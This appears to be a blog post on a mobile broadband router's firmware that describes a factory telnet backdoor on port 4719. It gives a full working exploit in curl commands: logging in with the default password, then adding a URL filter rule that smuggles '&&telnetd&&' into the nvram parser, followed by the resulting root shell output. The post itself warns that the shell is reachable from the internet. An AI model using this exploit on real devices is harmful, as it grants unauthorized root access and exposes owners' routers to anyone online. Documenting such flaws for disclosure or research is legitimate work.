Factory backdoor is triggered by opening specific URL. Password is device IMEI in hex but in encrypted form. This value is then decrypted using public key embedded in firmware. If result matches with device IMEI telnetd is started on port tcp/4719.
Here's syntax required to trigger factory backdoor, but it's useless without that encryption key.
curl -s -H "Referer: http://192.168.1.1/index.html" "http://192.168.1.1/goform/goform_set_cmd_process?isTest=false&goformId=CHANGE_MODE&change_mode=2&password=XXX"
We can still gain root shell on this device easily.
First we authenticate. Password is MIME encoded, here I use default password 1234.
curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=LOGIN&password=MTIzNA%3D%3D"
Next we add new URL filter rule that exploits bug in nvram parser to also start telnetd.
curl "http://192.168.1.1/goform/goform_set_cmd_process" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "Referer: http://192.168.1.1/index.html" --data "isTest=false&goformId=URL_FILTER_ADD&addURLFilter=http%3A%2F%2F_L33T_H4X0R_%2F%26%26telnetd%26%26"
One can now simply telnet to port 4719 on 192.168.1.1 and login as "admin" with password "admin".
(none) login: admin
Password:
BusyBox v1.15.0 (2016-10-25 20:15:21 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # uname -a
Linux (none) 2.6.31 #1 Tue Oct 25 20:15:00 CST 2016 mips GNU/Linux
~ #
This is persistent and will start telnetd on after next reboot unless this special URL is removed via web interface first. CAUTION! Telnet server listens also on WAN side. Meaning after activating it ANYONE can login to your router over Internet. So only do this with mobile broadband DISCONNECTED.
No comments:
Post a Comment
Got something to say?!